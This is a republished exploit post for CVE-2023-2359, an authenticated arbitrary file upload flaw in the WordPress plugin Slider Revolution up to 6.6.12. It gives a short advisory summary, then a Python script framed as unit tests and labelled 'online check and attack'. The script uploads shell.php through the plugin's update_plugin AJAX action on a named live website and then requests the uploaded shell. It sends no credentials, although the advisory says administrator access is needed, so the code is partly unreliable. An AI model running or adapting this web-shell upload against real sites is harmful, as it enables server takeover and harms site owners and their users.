exploit Slider Revolution < = 6.6.12 - Authenticated (Administrator+) Arbitrary File Upload
2023-10-30 05:38:23 Author: cxsecurity.com(查看原文) 阅读量:24 收藏

Slider Revolution <= 6.6.12 - Authenticated (Administrator+) Arbitrary File Upload 7.2 Unrestricted Upload of File with Dangerous Type CVSS VectorCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H CVE CVE-2023-2359 CVSS 7.2 (High) Publicly Published May 22, 2023 Last Updated May 30, 2023 Researcher Marco Frison Description The Slider Revolution plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in versions up to, and including, 6.6.12. This makes it possible for authenticated attackers with administrator-level attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. While the default settings allow only administrators to exploit this vulnerability, this privilege can be granted to users as low as author. EXPLOIT : ################################### # online check and attack # Revolution Slider <= 6.6.12 - Author+ Remote Code Execution ################################### import unittest import requests class TestSliderRevolution(unittest.TestCase): def test_upload_file(self): url = "http://adroom.ir/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin" file = open("shell.php", "rb") data = {"update_file": file} response = requests.post(url, files=data) self.assertEqual(response.status_code, 200) self.assertIn("Update in progress", response.text) def test_execute_code(self): url = "http://adroom.ir/wp-content/plugins/revslider/temp/update_extract/revslider/shell.php" response = requests.get(url) self.assertEqual(response.status_code, 200) self.assertIn("Hello, world!", response.text) if __name__ == "__main__": unittest.main()

References:

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/revslider/slider-revolution-6612-authenticated-administrator-arbitrary-file-upload

https://wpscan.com/vulnerability/a8350890-e6d4-4b04-a158-2b0ee3748e65/

https://vuldb.com/?id.231920




 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2023100058
如有侵权请联系:admin#unsafe.sh